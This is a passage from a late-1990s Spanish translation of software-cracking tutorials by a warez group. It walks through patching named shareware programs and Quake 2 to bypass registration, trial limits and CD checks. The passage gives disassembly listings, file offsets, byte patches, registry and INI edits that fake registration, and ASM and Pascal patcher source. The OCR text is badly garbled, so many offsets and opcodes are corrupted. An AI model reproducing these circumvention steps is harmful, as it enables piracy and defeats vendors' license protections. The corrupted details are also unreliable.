:0044DB91 7E18 jle 0044DBAB 


P15. Mira en 0044DB7D y en 0044DB91. donde saltaras. 
Pon la barra verde en 
:0044DB7D 752C jne 0044DBAB 
y deberias ver el offset (PDOffset 00O04CF7Dh. donde parchear MSCHED.EXE. 


P16. Regresa a WC, corre HIEW MSCHED.EXE, pulsa F4 pal Decode mode 
(ASM), pulsa FS y entra 4CF7D. Deberias ver: 


.0004DB7D: 752C jne .00004DBAB ---------- (1) 
.0004DB7F: 8B83D4090000 mov  eax,[ebx][0000009D4] 
.0004DB 85: 8B30FC000000 mov  eax,[eax][0000000éíFC] 
.0004DB8B: 8B10 mov  edx,[eax] 

.0004DB8D: FF5210 call d,[edx][00010] 

.0004DBO00: 48 dec eax 

.0004DB91: 7E18 jle .00004DBAB  ---------- (2) 


P17. Vamos a cambiar los bytes,pulsa f3 y luego Eb 
ponte sobre 7E18 (offset 47F91), y entra EB, F9 para actualizar MSCHED.EXE. 
y sal de HIEW. 


P18. Todavia no esta! Abre la ventana SDR y pulsa sobre "Unregistered 
copies..” otra vez. 


P19. Cierra la ventan SDR, Para ver estas lineas: 


* Possible StringData Ref from Code Obj ->"Unregistered copies of Macro.." 
->"have a limit of 20 lines per.." 


:00450D3F B8001D4300 mov eax, 00451D00 


P20. Ok, pulsa arriba hasta ver: 


:00450D21 74CC je 00450CEF 
:00450D23 8BC7 mov eax, edi 
:00450D25 E86635FBFF call 00404290 
:00450D2A E8SC919FBFF call 004026F8 
:00450D2F 83FB 14 cmp ebx, 00000014 
:00450D32 7ElA jle 0O0450D4E 


P21. Mira en la direccion 00450D32, donde se saltara 
vamos haya otra vez. Esta vez la barra verde sobre 
:00450D32 7E1A jle 0O0450D4E 
Deberias ver el Offset (Offset 00050132h. donde parchear el MSCHED.EXE. 


P22. Regresa a WC, corre HIEW MSCHED.EXE, pulsa F4 para Decode mode 
(ASM), pulsa FS y entra 4CF7D. Deberias ver: 


.00050D32: 7E1A jle .000050D4E  ---------- (4) 
.00050D34: 6A00 push 000 
.00050D36: 668B0DF41C4500 mov  cx,[000451CF4] 


P23. Pulsa F3, entra EB y presiona F9 para actualizar MSCHED.EXE. Sal de HIEW. 


P24. TODAVIA NO ESTA!! (otra vez:-)) Abre la ventana SDR y pulsa en 
"Unregistered copies..”" de nuevo 


P25. Cierra SDR, Deberias ver: 


* Possible StringData Ref from Code Obj ->"Unregistered copies of Macro.." 
->"have a limit of 20 lines per.." 


:00452D25 B8E82F4500 mov eax, 00452FE8 


P26. Ok, pulsa arriba hasta ver: 


:00452D01 7531 jne 00452D34 

:00452D03 8B45FC mov eax, dword ptr [ebp-04] 

:00452D06 8B80D4090000 mov eax, dword ptr [eax+000009D4] 
:00452D0C 8B 80FC000000 mov eax, dword ptr [eax+000000éFC] 
:00452D12 8B10 mov edx, dword ptr [eax] 

:00452D14 FF5210 call [edx+10] 

:00452D17 48 dec eax 

:00452D18 7E1A jle 00452D34 


P27. mira en las direcciones 00452D01 y 00452D18. Pon la barra verde en 
:00452D01 7531 jne 00452D34 
y deberias ver el Offset (Offset 00052101h. donde parchear el MSCHED.EXE. 


P28. Regresa a WC, corre HIEW MSCHED.EXE, pulsa F4 para elegir Decode mode 
(ASM), pulsa FS y entra 52101. Deberias ver: 


.00052D01: 7531 jne .000052D34 ---------- (1) 
.00052D03: 8B45FC mov  eax,[ebp][-0004] 
.00052D06: 8B80D4090000 mov  eax,[eax][0000009D4] 


.00052D0C: 8B80FC000000 mov  eax,[eax][0000000FC] 


.00052D12: 8B10 mov  edx,[eax] 

.00052D14: FF5210 call d,[edx][00010] 
.00052D17: 48 dec eax 

.00052D18: TELA jle .000052D34  ---------- (2) 


P29. Ahora pulsa F3, entra EB y ponte en 7E1A (offset 52118), entra EB y F9 
Sal de HIEW. 


P30. Finalmente, corre MSCHED.EXE e intenta aderir mas macros o mas de 20 lineas 
en un script. Funcina? Bien!!, Lo has hecho!! 

PART 3: Crackear TrayCal 1.0 (Metiendo cualquier numero) 

P1. Corre TRAYCAL.EXE 


P2. Entra tu nombre y codigo, veras el mensaje que dice que has entrado un 
codigo invalido. y sal del programa 


P3. Ok, sal del programa 
P4. corre WC, ve al directorio TrayCal 


PS. Copia TRAYCAL.EXE a TRAYCAL.EXX (backup) y copia TRAYCAL.EXE a 
TRAYCAL.W32 (para el W32Dasm) 


P6. Corre W32Dasm y desensambla TRAYCAL.W32 


P7. Una vez desensamblado, pulsa en STRING DATA REFERENCE, pulsa sobre 
"Sorry, invalid registration code..". 


PS. Cierra la ventana SDR, y observa: 


:0043FD30 7E1A jle 0043 FD4C 

:0043FD32 6A00 push 00000000 

:0043FD34 668B0DE4FF4300 mov cx, word ptr [0043FFE4] 
:0043FD3B 33D2 xor edx, edx 


* Possible StringData Ref from Code Obj ->"Sorry, invalid registration code." 


Mira en la direccion 0043FD30, donde se salta al meter un codigo erroneo 


Barra verde en 
:0043FD30 7E1A jle 0043 FD4C 
Y Offset 0003F130h. donde modificar el TRAYCAL.EXE. 


P9. Regresa a WC, corre HIEW TRAYCAL.EXE, pulsa F4 (Decode mode(ASM) 
FS y entra 3F130. Veras esto: 


.0003FD30: 7E1A jle .00003FD4C  ---------- (1) 
.0003FD32: 6A00 push 000 
.0003FD34: 668B0DE4FF4300 mov  Cx,[00043FFE4] 


.0003FD3B: 33D2 xor  edx,edx 


P10. F3, entra EB, ahora F9 para actualizar TRAYCAL.EXE. Sal de HIEW. 
P11. Corre TRAYCAL.EXE, Funciona? NO, lo compara tambien con el registro 
P12. Regresa a W32Dasm, pulsa de nuevo en "Sorry, invalid registration.." 

P13. Cierra SDR y veras esto: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


|:0043FE34(C) 

| 

:0043FF1B 6A00 push 00000000 

:0043FF1D 668B0DE4FF4300 mov cx, word ptr [0043FFE4] 
:0043FF24 33D2 xor edx, edx 


* Possible StringData Ref from Code Obj ->"Sorry, invalid registration code." 


Ves la direccion refrenciada? : 0043FE34(C>) 
Pulsa PgUp 2 0 3 veces hasta ver 


:0043FE34 0F85E 1000000 jne 0043FF1B 
* Possible StringData Ref from Code Obj ->"SoftwarelSpaeder" 
:0043FE3A 8B0DDC194400 mov ecx, dword ptr [004419DC] 


P14. Mira en la direccion 0043FE34, Lo comparara de nuevo antes de adherirlo 
a los datos del registro de windows. Vamos a intentarlo. 
Pon la barra verde en :0043FE34 0F35E1000000 jne 0043FF1B 
Y esta vez el offset a parchear esta en Offset 0003F234h. 


P15. Regresa a WC, corre HIEW TRAYCAL.EXE, pulsa F4 para Decode mode 
(ASM), presiona FS y entra 3F234. Deberias ver: 


.0003FE34: 0F85E1000000 jne .00003FFIB  ---------- (1) 
.0003FE3A: 8B0DDC 194400 mov  ecx,[0004419DC] 
.0003FE40: B201 mov  dl,001 

.0003FE42: A128D84300 mov  eax,[00043D828] 


P16. Presiona F3, entra 0F84, F9 y sal de HIEW. 
P17. Corre TRAYCAL.EXE, Ahora si funciona, lo has registrado!! 
PARTE 4: Porque copio el archivo *.EXE a *.W32 


Se que mucha gente se preguntara porque hago esto, es facil... 

Uso *.EXX para cuando el programa modificado no funciona, despues podria copiar 
* EXX a *.EXE y volver al ejecutable original. Y *.W32 porque no puedo parchear 
el ejecutable cuando esta siendo usado con el w32dasm 

Acuerdate de salvar las filas desensambladas al salir del W32Dasm, para que la 
proxima vez no tengas que hacerlo de nuevo 


PART 5: Codigo fuente ASM para un parche por Nop/PC '97 


; Patcher by Nop [Pc] - SourceCode 100% free 


> 


; To use with A86: 
: A86 CrkNop.asm 


; To use with TASM: 
: tasm CrkNop.asm 
E tlink /t CrkNop.obj 


Ed 


; Greetz to all members of the Scene 


> 


.MODEL TINY 

.CODE 

.286 

ORG 100h 

start: 
mov  ah,9 ; pb Show Title p 
mov dx, offset MainTitle 

int 21h 
mov ax, 3D02h ; b Open File p 
mov dx, offset filename 
int 21h 
jnb Ok 
mov  ah,9 ; p File Not Found p 
mov dx, offset error 
int 21h 
mov ax, 4C01h ; pb Exit with error pb 
int 21h 

Ok: 
mov  bx,ax ; p Move pointer b 


mov ax, 4200h 

mov  cx,0 ; segment 
mov  dx,565 ; Offset 
int 21h 


mov ax, 4000h ; p Write values b 


mov  cx,1l ; number of bytes to write 
mov dx, offset BytesToWrite 

int 21h 

mov ax, 3E00h ; pb Close file p 

int 21h 

mov  ah,9 ; pb Show msg b 

mov dx, offset done 

int 21h 

mov ax, 4C00h ; p All Done And Exit p 
int 21h 


> 


MainTitle db ODh,0Ah 
db ' ÚBBABBBBBBOU VUUBBBBBBBOUO UBBBBBBBBODO' ODh,0Ah 
db'Ú ÚÚ ÚÚ Ú'ODh,0Ah 
db'ÚÓ Ó O Ú ÚU Ú UÚ'0Dh,0Ah 


db'Ú Ú O Ú ÚU UÚ'ODh,0Ah 
d'Ú Ú O Ú ÚUÚ UÚSBBBBB 'ODh,0Ah 
d'Ú Ú UU ÚÚ Ú proudly',ODh,0Ah 


db ' ÚVUVUUUVUVOOÚ BÚVUUUUUOOÓS ÚVOOO presents',ODh,0Ah 
db ' UUVUVUUOUUUUUUUUUUUUUUUUUUUUUUUVUUUVUUOÚ”ODh,0Ah 


db 'Ú8 8Ú'ODh,0Ah 
db 'Ú PROG NAME Ú'ODh,0Ah 
db 'Ú REMOVE CD-CHECK Ú' ODh,0Ah 
db 'Ú BY NOP Ú'ODh,0Ah 
db 'ÚU UÚ'ODh,0Ah 
db ' BBBBBBBBBBBBBBBBBBBBBBBBBBBB888888888 ',ODh,0Ah 
db ODh,0Ah,'$' 
error db ' p ERROR: Hm... problem with file ? '¡ODh,0Ah,'$' 


filename db 'FILE.EXE',0 
done db ' b Enjoy ! , ODh,0Ah,'$' 


BytesToWrite db OEBh 
end start 
Suficiente por ahora, espero que hayas disfrutado tanto como yo, nos vemos 


en el proximo tutorial 


Saludos y agradecimientos a Taha, Taylor, ThatDude, Archimede, PowerLord and everyone in PC!! 


Este tutor esta dedicado a Taha.. 

Puedes encontrarme en F*pc98 o en mi email tkc Ogoplay.com 
Enjoy it, 

The Keyboard Caper, 


The Founder of PhRoZeN CReW '94 - '98 
25-12-1997 


Traducido por Muñoz! 06-2-00 


Oscar 10.0 


Hola! 


De nuevo con el tutorial de cracking 
Esta vez te enseñare como jugar con el registro de WINDOS y como matar Timeouts. :-) 


Todavia no empiezo con el softice 


HERRAMIENTAS 


W32Dasm 8.9 o superior (www.expage.com/page/w32dasm) 

Hacker's View 5.66 (E-mail: sen Osuslikov.kemerovo.su) 

FAR 1.50b (ftp://ftp.elf.stuba.sk/pub/pc/utilfile/far150b.exe) 

o Windows Commander 3.50 Beta 5 en vez de este ultimo (http://www. ghisler.com) 


CONTENIDOS: 


1) Como registrar TrayCal 1.0 usando el registro de WINDOWSs 
URL: http://www.spaeder.com 

2) Como registrar CopyPaste 1.20 
URL: http://www.wz.com/scriptsoftware 

3) Como remover el limite de tiempo en Radio Destiny 0.2 
URL: http://www.destiny-software.com/destiny 

4) Codigo fuente en PASCAL por tKC/PC '98 


PARTE 1: Registrar TrayCal 1.0 
P1. Corre TRAYCAL.EXE 


P2. Veras que tienes 15 usos para evaluacion. Haz click sobre TC, y Register 
Entra tu nombre y cualquier codigo; resultado Invalid registration code. 


P3. Ok, sal del programa. 

P4. Corre WC, ve al directorio TrayCall 

PS. Copia TRAYCAL.EXE como TRAYCAL.W32 
P6. Desensambla TRAYCAL.W32 


P7. cuando lo hayas hecho, pulsa en STRING DATA REFERENCE, y buca 
"Sorry, invalid registration code.". doble click sobre el y:. 


P8. Cierra la ventana SDR, Deberias ver: 
* Possible StringData Ref from Code Obj ->"Sorry, invalid registration code." 


:0043FD3D A1E8194400 mov eax, dword ptr [004419E8] 
:0043FD42 E88DO2FFFF call 0042 FFD4 


P9. Ok, Vamos a ver que ocurre al meter un codigo malo. Pulsa PgDn 
3 0 4 veces hasta ver: 


* Possible StringData Ref from Code Obj ->"SoftwarelSpaeder" 


| 
:0043FE3A 8B0DDC194400 mov ecx, dword ptr [004419DC] 


:0043FE40 B201 mov dl, 01 

:0043FE42 A128D84300 mov eax, dword ptr [0043D828] 
:0043FE47 E880E1 FFFF call 0043DFCC 

:0043FE4C A3FC274400 mov dword ptr [004427FC], eax 
:0043FE51 C605C819440001 mov byte ptr [004419C8], 01 
:0043FE58 A0C8194400 mov al, byte ptr [004419C8] 
:0043FE5D 50 push eax 


* Possible StringData Ref from Code Obj ->"EnhancedSystemDate" 


| 
:0043FESE B920004400 mov ecx, 00440020 


* Possible StringData Ref from Code Obj ->"TrayCal" 


:0043FE63 8B 15D8194400 mov edx, dword ptr [004419D8] 
:0043FE69 A1FC274400 mov eax, dword ptr [004427FC] 
:0043FE6E ESADESFFEF call 0043E420 

:0043FE73 6A01 push 00000001 


* Possible StringData Ref from Code Obj ->"RegistrationStatus" 


P10. Interesante.. ¿Has visto "RegistrationStatus"? Vamos a abrir el REGEDIT y 
Hechar un vistazo en HKCUNWSoftwarelSpaeder TrayCal: 


EnhancedSystemDate="0" 
RegistrationStatus="0" 


Que quiere decir esto? Deberias saber que hacer! :-) Ok, 
Reemplaza los O por 1. Quedaria esto: 


EnhancedSystemDate="1" 
RegistrationStatus="1" 


Debemos modificar la clave EnhancedSystemDate tambien, 
Si no no trabajaría. Ok, pulsa F5 para actualizar el registro 


P11. Corre TRAYCAL.EXE. Haz click en About. Wow, Ahora esta registrado, Facil ¿no? 


P12. Puedes exportar esto a un archivo HKCUMSoftwarelSpaeden TrayCal. 
que modifica el registro, salvalo como TC.reg 


REGEDIT4 
[HKEY_CURRENT_USERNSoftwarelWSpaeden TrayCal] 


"RegistrationStatus"="1" 
"EnhancedS ystemDate"=" " 


P13. Puedes pasar la informacion al registro haciendo doble clik sobre 
TC.REG 


PARTE 2: Como registrar CopyPaste 1.20 

P1. Corre CopyPaste.EXE 

P2. Entra cualquier password y saltaras al error 

P3. Ok, sal del programa 

P4, Corre WC, ve al directorio CopyPaste. 

PS. Copia CopyPaste.EXE a CopyPaste.EXX y a CopyPaste.W32 
P6. Corre W32Dasm y desensambla CopyPaste.W32 


P7. Pulsa en STRING DATA REFERENCE, busca la cadena 
"Wrong password - no register..”. y pulsa sobre ella 


PS. Cierra SDR, veras esto: 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
1:00403427(C), :00403438(C) 


:0040346F 8D442430 lea eax, dword ptr [esp+30] 
:00403473 68FF000000 push 000000éFF 

:00403478 50 push eax 

:00403479 8B0D1C664100 mov ecx, dword ptr [0041661C] 


* Possible Reference to String Resource ID=00014: "Wrong password - no reg.." 


P9. Has visto quien llama a la funcion? (403427 y 403438) Ok, pulsa PgUp 
hasta ver 


:00403427 7446 je 0040346F 

:00403429 8D442410 lea eax, dword ptr [esp+10] 
:0040342D 50 push eax 

:0040342E E81D400000 call 00407450 

:00403433 83C404 add esp, 00000004 
:00403436 85C0 test eax, eax 

:00403438 7435 je 0040346F 

:0040343A 8D442430 lea eax, dword ptr [esp+30] 
:0040343E 68FF000000 push 000000éFF 

:00403443 50 push eax 

:00403444 8B0D1C664100 mov ecx, dword ptr [0041661C] 


* Possible Reference to String Resource ID=00013: "Thank you for regist..." 


P10. Mira en 00403427, es dond saltas cuando te joden. 
Vamos a ver asegurate que la barra verde esta en 
: 00403427 7446 je 0040346F 
Deberias ver el Offset 00002827h. donde poder parchear 


P11. Regresa a WC, corre HIEW COPYPA-1.EXE, pulsa F4, FS y 2827. 
deberias ver: 


00002827: 7446 je  00000286F ---------- (0) 
00002829: 8D442410 lea eax,[esp][00010] 
0000282D: 50 push eax 

0000282E: E81D400000 call 000006850 ---------- (Q) 
00002833: 83C404 add  esp,004 

00002836: 85C0 test eax,eax 

00002838: 7435 je  00000286F ---------- (3) 


NOTE: Para prevenir la confusion de offsets en HIEW, edita la linea siguiente en HIEW.INI, 
ShowOffset = Global 


P12. Pulsa F3, entra 9090 y ve sobre 7435 (offset 2838), entra 9090, F9 y sal de HIEW. 


P13. Corre CopyPaster.EXE, Funciona? *eeyaa* Lo has hecho!! 


PARTE 3: Remover el limite de tiempo en Radio Destiny 0.2 
P1. Corre RADIO.EXE 

P2. *boom* Esta version ha expirado. Sal del programa 

P3, Corre WC, ve al directorio RADIO 

P4. Ya sabes, RADIO.EXE a RADIO.EXX y a RADIO.W32 
PS. Corre W32Dasm y desensambla RADIO.W32. 


P6. Una vez desnesmablado haz click sobre STRING DATA REFERENCE, 
busca "This version has expired.”. 
no habras encontrado la cadena, ¿ahora que? 
El modo Debugger en W32Dasm no trabajara porque es un programa de 16 bits 
Vamos a intentarlo... 


P7. No quites W32Dasm.. corre HIEW RADIO.EXE. F4 para HEX Mode, 
pulsa F7. y busca "This version has exp" Ahora que? encontraras el offset como 6426 


PS. Regresa a W32Dasm, pulsa PgDn hasta que encuentres la direccion offset 
"00006A 26h" 


P9. Wow, Que tenemos? Esto: 


:0001.63A6 54686973207665727369 DB "This versi" 
:0001.63B0 6F6E2068617320657870 DB "on has exp" 
:0001.63BA 697265642E00 DB "ired.",0 


Presiona PgUp 3 o 4 veces. en algun lugar veras "BYTE xxxxh" ignoralo 


P10. Hmm, Que ves? 
Call USER.MESSAGEBOX!! 


:0001.630A 9AC75B0000 call USER.IMESSAGEBOX 
Ya sabemos donde se llama al mensaje de expiración 


Pulsa arriba hasta ver 


:0001.62F1 7C21 316314 
:0001.62F3 7F05 jg 62FA 
:0001.62F5 3DB40B cmp ax, 0BB4 
:0001.62F8 761A jbe 6314 


P11. Mira en 0001.62F1,Donde se salta 
Pon la barra verde en la direccion 0001.62F1 
el offset sera 00006971h. 


P12. Regresa a WC, corre HIEW RADIO.EXE, F4, ES y 6971.deberias ver: 


00006971: 7C21 jl. 000006994 
00006973: 7FOS jg  00000697A 
00006975: 3DB40B cmp  ax,00BB4 
00006978: 761A jbe 000006994 


P13. Modifiquemos los bytes pulsando F3, entrando EB 
y actualizando con F9. Sal de HIEW. 


P14. Ok, corre RADIO.EXE *boom* Funciona!! :-) 


PART 4: Codigo fuente en PASCAL por tKC/PC '98 


Ro < Cut here > nooo 
Uses Crt; 
Const A: Array[1..4] of Record (<-------- 4 bytes to be patched]) 
A : Longint; 
B : Byte; 
End = 
((A:$2827;B:$90), [ <--========="- offset "2827" and byte "90" to be changed) 
(A:$2828;B:$90), [ <---------=-==--- offset "2828" and byte "90" to be changed) 
(A:$2838;B:$90), [ <--------------- offset "2838" and byte "90" to be changed) 
(A:$2839;B:$90)); [ <---=--=--==-==--- offset "2839" and byte "90" to be changed) 
Var Ch:Char; 
I:Byte; 
F:File; 
EFN:file of byte; 


Size:longint; 


Begin 


Writeln(Little Patch');writeln(Crack for CopyPaste 1.20 by tKC/PC "98'); 
Assign(F,COPYPA-1.EXE"); [<= -=---- filename to be patched) 
[SI-]) Reset(F, 1); (SI+) 
If IOResult <> O then 
begin 
writeln("File not found!”); 
haltO); 
end; 
For l:=1 to 4 do [<oo------- 4 bytes to be patched]) 
Begin 
Seek(F,A[I].A); 
Ch:=Char(A[I].B); 
Blockwrite(F,Ch, 1); 
End; 
Writeln(File successfully patched!'); 


End. 


Espero que hayas disfrutado tanto como yo. nos vemos en el capitulo 6 


Agradecimientos a to Taha, Taylor, ThatDude, Archimede, PowerLord and everyone in PC!! 
Enjoy it, 

The Keyboard Caper, 

The Founder of PhRoZeN CReW '94 - '98 

4-1-1998 


Traducido por Muñoz! 


Tutorial de tKC sobre Cracking (Leccion 6) 
Hola! 


En este tutor te enseñare sobre todo acerca de W32Dasm. Lo siento, ni softice 
ni IDA por ahora, pero como ya tengo una nueva maquina, y en el siguiente tutorial 
hablare del Softice 


CONTENIDOS: 


1) Como registrar DocSweep 3.0 
Usando el registro de windows, sin parchear el programa 
URL: http://www.spaeder.com 


2) Como registrar Cover Your Tracks 2.0 
Usando archivos INI, sin parchear 
URL: http://www. geocities.com/SiliconValley/Vista/5610/ 


3) Como crackear el chequeo del CD en Quake 2 3.10 
Parcheandolo podras jugar sin el cd 
URL: http://www.idsoftware.com 


4) Como registrar TrayRun 2.0.1 
Parcheado el programa para acceptar tu codigo de registro, pero 
todavia no registrado despues de reiniciar el programa. y como solucionarlo 
La mayoria de los programas Shareware usan protecciones basadas en escribir algo 
en el registro 
URL: http://www.mjtnet.com 


5) Codigo fuente en Pascal de tKC/PC '98 
Necesitaras Turbo Pascal 7.0 para compilarlo 


6) Ultimas palabras 

HERRAMIENTAS: 

Las herramientas que necesitas son 

W32Dasm 8.9 - http://www.fortunecity.com/bally/waterford/18/w32dsm89.zip 
Hacker's View 5.66 - ftp://ftp.cdrom.com/.27/sac/utilprog/hiew366.zip 


FAR 1.50b - ftp://rwntug.quarta.msk.ru/WinUtil/Rar/far150b.exe 
o el Windows Commander 3.50 Beta 7 - http://www.ghisler.com 


NOTA: Puedes encontrar otras herramientas como Softlce 3.22, IDA 3.70 y otros 
programas muy utiles en http://cracking.home.ml.org 
Pero no las necesitaremos para el siguiente tutor. 


PART 1: Como registrar DocSweep 3.0 


Step 1. Corre DOCSWEEP.EXE 


Step 2. Veras que tienes 30 evaluaciones para el programa. 
Pulsa en DS, y haz click en Reg Number. Entra tu nombre y algun 
codigo y veras el mensaje de error 


Step 3. Sal del programa 
Step 4. Corre WC, ve al directorio DocSweep 
Step 5. Copia DOCSWEEP.EXE como DOCSWEEP.W32 
Step 6. Desensambla DOCSWEEP.W32 
Step 7. Una vez hecho esto, pulsa en STRING DATA REFERENCE, y busca 
la cadena "Invalid registration code.", haz click sobre ella 

Step 8. Cierra la ventana de SDR, deberias ver: 

* Possible StringData Ref from Code Obj ->"Invalid registration code." <---- bad boy 


:0043578D A138784300 mov eax, dword ptr [00437838] 
:00435792 E89952FFFF call 0042AA30 


Step 9. Vamos, a ver que ocurre si metemos un codigo erroneo. Pulsa PgUp 
l o 2 veces hasta que veas: 


:004356E1 0F359B000000 jne 00435782 <---- 1f invalid code, goto bad boy 


* Possible StringData Ref from Code Obj ->"SoftwarelSpaeder" 


:004356E7 8B0D34784300 mov ecx, dword ptr [00437834] 

:004356ED B201 mov dl, 01 

:004356EF B86C394300 mov eax, 0043396C 

:004356F4 ESCFESFFFF call 00433FC8 

:004356F9 A398864300 mov dword ptr [00438698], eax 

:004356FE C6059C86430001 mov byte ptr [0043869C], 01 <---- good boy 
:00435705 A09C864300 mov al, byte ptr [0043869C] 

:0043570A 50 push eax 


* Possible StringData Ref from Code Obj ->"Enhanced Hard Drive" 
Step 10. Interesante... Has visto eso?? Inicia el REGEDIT y busca 
HKCUWSoftwarelSpaederiDocSweep: 
SectorsPerPartition="178" 
Hmm, Vamos a poner una nueva cadena. Deberias ver: 


Enhanced Hard Drive="1" 
SectorsPerPartition="178" 


Ok, pulsa FS para actualizar el registro 


Step 11. Corre DOCSWEEP.EXE. Pulsa en DS, y en About. WoW, Ahora esta registrado!! 
Facil no? 


Step 12. Hay otro camino para registrar DocSweep. Quieres meter 
cualquier valor? Cambia el "1" por "0" en Enhanced Hard Drive 
y cambia JNE por JE en la direccion 4356E1 
Corre Ds y entra tu nombre y algun codigo y lo registrara 


PARTE 2: Como registrar Cover Your Tracks 2.0 
Step 1. Corre CYT.EXE 


Step 2. Veras la NAG que te recordara que te registres. pulsa en Register 
y entra cualquier nombre y cualquier codigo; lo siento, codigo invalido 


Step 3. Ok, Sal del programa. 

Step 4. Corre WC, y ve al directorio CY T 

Step 5. Copia CYT.EXE a CYT.W32 

Step 6. Corre W32Dasm y desensambla CY T.W32 


Step 7. Una vez densensamblado pulsa en STRING DATA REFERENCE,para buscar 
"Invalid code.”. Himm, no hay cadenas, y ahora que? Ok, vamos a 
intentar buscar "Registered" y pulsa un par de veces sobre el. 


Step 8. Cierra la ventana SDR deberias ver: 
* Possible StringData Ref from Code Obj ->"Registered” <---- Buen Chico 


:0043E7A1 BA6CE84300 mov edx, 0043E86C 
:0043E7A6 E841E6FDFF call 0041 CDEC 


Step 9. Ok, Vamos a ver lo que hace. pulsa en PgUp una o dos veces 
hasta que veas: 


* Possible StringData Ref from Code Obj ->"C:1windowsisystemisystem.cyt" 


:0043E743 BA34E84300 mov edx, 0043E834 
:0043E748 8B08 mov ecx, dword ptr [eax] 


* Possible StringData Ref from Code Obj ->"true" <---- Buen chico 


:0043E769 BA5CE84300 mov edx, 0043E85C 
:0043E76E E85153FCEFF call 00403AC4 
:0043E773 7418 je 0043E78D <----Si no es igual Malchico 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:0043E773(C) 


:0043E78D C605EC27440001 mov byte ptr [004427EC], 01 


:0043E794 A1001C4400 mov eax, dword ptr [00441C00] 
:0043E799 8B00 mov eax, dword ptr [eax] 
:0043E79B 8B8020020000 mov eax, dword ptr [eax+00000220] 


* Possible StringData Ref from Code Obj ->"Registered” <----Buen chico 


Step 10. Interesante lo que hemos visto. 
Que es "Ciwindowsisystemisystem.cyt"? 


Vamos a buscar un archivo en CAwindowslsystemisystem.cyt y nos encontramos: 
6 


false 


Step 11. Hmm, Cambiemos el "false" por "true". Salvalo y corren CYT.EXE 
WOW, Registrado!! Es una de las protecciones mas estupidas que he visto 


PART 3: Como crackear el chequeo de CD que hace el Quake 2 3.10 
Step 1. Corre QUAKE2.EXE 


Step 2. Veras que tienes que insertar el Cd para jugar, Ok, no hay problemas, 
vamos a escribir el mensaje de error: "You must have the Quake2 CD int he drive to play" 


Step 3. Sal del programa 

Step 4. Corre WC, y ve al directorio Quake2 

Step 5. Copia QUAKE2.EXE como QUAKE2.EXX, y copia QUAKE2.EXE como QUAKE2.W32 
Step 6. Corre W32Dasm y desensambla QUAKE2.W32 


Step 7. Busca en STRING DATA REFERENCE,la cadena "You must have the Quake2 CD in..". 
Y pulsa sobre ellos 


Step 8. Cierra la ventana SDR, Deberias ver: 
* Referenced by a CALL at Address: 


1:00429038 <---- Que es esto? 


:0042D4F0 ES3BFFFFFF call 0042D430 
:0042D4F5 803800 cmp byte ptr [eax], 00 
:0042D4F8 750F jne 0042D509 <----Mal chico 


* Possible StringData Ref from Data Obj ->"You must have the Quake2 CD in " 
->"the drive to play." 


Step 9. Ok, vamos a encontrar que llama a este procedimiento. Hmm, ¿Has visto lo 
que he visto?, referenciado por una llamada en 429038! 


Pulsa en el boton Goto Code Location, y entra 429038. 


Step 10. Que es lo que obtenemos? Aqui estamos: 


:00429034 85C0 test eax, eax 
:00429036 7505 jne 0042903D <---- Si no,vamos al buen chico 
:00429038 ESB 3440000 call 0042D4F0 <---- Mal chico! 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
1:00428FES(U), :00428FFS(C), :00429019(U), :00429036(C) 


:0042903D E84E710000 call 00430190 <---- good boy! 


Step 11. Ok, Cambiemos 75 por EB en la direccion 429036. 
Asegurate que la barra verde este en 
:00429036 7505 ¡ne 0042903D, deberias ver el Offset 00028436h. 
Es donde podemos parchear el QUAKE2.EXE. 


Step 12. Regresa a WC, corre HIEW QUAKE2.EXE, pulsa F4 para elegir Decode mode 
(ASM), ES y entra 28436. Deberias ver: 


00028436: 7505 jne 00002843D ---------- (1) 
00028438: ESB 3440000 call 00002C8FO ---------- Q) 
0002843D: ES4E710000 call 00002F590 ---------- 3) 
00028442: 8BODECOF4700 mov ecx,[000470FEC] 
00028448: A388104700 mov  [000471088],eax 


Step 13. Ahi podemos cambiar los bytes, pulsa F3 y EB y presiona F9 para 
actualizar QUAKE2.EXE. Sal de HIEW. 


Step 14. Corre QUAKE2.EXE, funcioan? *eeyaa* Lo has hecho!! 


PARTE 4: Como registrar TrayRun 2.0.1 
Step 1. Corre TRAYRUN.EXE 


Step 2. Pulsa sobre Register, y entra cualquier numero y cualquier nombre. Registro 
Invalido 


Step 3. Sal del programa 

Step 4. Corre WC, y ve al directorio TRAYRUN 

Step 5. Copia TRAYRUN.EXE a TRAYRUN.EXX y copia TRAYRUN.EXE como TRAYRUN.W32 
Step 6. Corre W32Dasm y desensambla TRAYRUN.W32 


Step 7. Una vez desensamblado busca "Registration Failed" entre las STRING 
DATA REFERENCE, y haz click sobre ella 


Step 8. Cierra la ventana de SDR y veras: 


* Possible StringData Ref from Code Obj ->"RegC" <---- y esto? 


:0042E6C0 BAACE74200 mov edx, 0042E7AC 
:0042E6C5 8BC6 mov eax, esi 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0042E64C(C) 


* Possible StringData Ref from Code Obj ->"Registration Failed." <----Mal chico 
:0042E6F6 B8BCE74200 mov eax, 0042E7BC 


Step 9. Has visto lo que yo, Salto referenciado! Ok, Vamos a pulsar en 
Goto Code Location y entrar 42E64C, ahora veremos: 


:0042E64C 0F35A4000000 jne 0042E6F6 <---- si no, saltamos a bad boy 
* Possible StringData Ref from Code Obj ->"Registration Succesful.” <---- Buen chico 
:0042E652 B848E74200 mov eax, 0042E748 


Step 10. Vamos a jugar! Asegurate de que 0042E64C 0F85A4000000 este en la 
barra verde y por lo tanto veras Offset 00O02DA4Ch. Aqui parchearemos 
el TRAYRUN.EXE. 


Step 11. Regresa a WC, corre HIEW TRAYRUN.EXE, pulsa F4 para seleccionar Decode 
mode (ASM), pulsa FS y presiona 2DA4C. Deberias ver: 


0002DA4C: OF85A4000000 jne 00002DAF6 ---------- 0) 
0002DA52: B848E74200 mov  eax,00042E748 
0002DA57: ES7CBBFFFF call 0000295D8 ---------- 6) 
0002DASC: B201 mov  dl,001 

0002DASE: B870304200 mov  eax,000423070 
0002DA63: ESBC4AFFFF call 000022524 ---------- (4) 


Step 12. Pulsa F3 entra 0F84 y presiona F9 para actualizar los cambios 
Sal del HIEW 


Step 13. Corre TRAYRUN.EXE. Entra cualquier nombre/codigo y te dice que estas 
registrado pulsa en About y veras tu nombre... 


Step 14. Sal de TrayRun y correlo de nuevo. Hmm, Todavia no estamos registrados? 
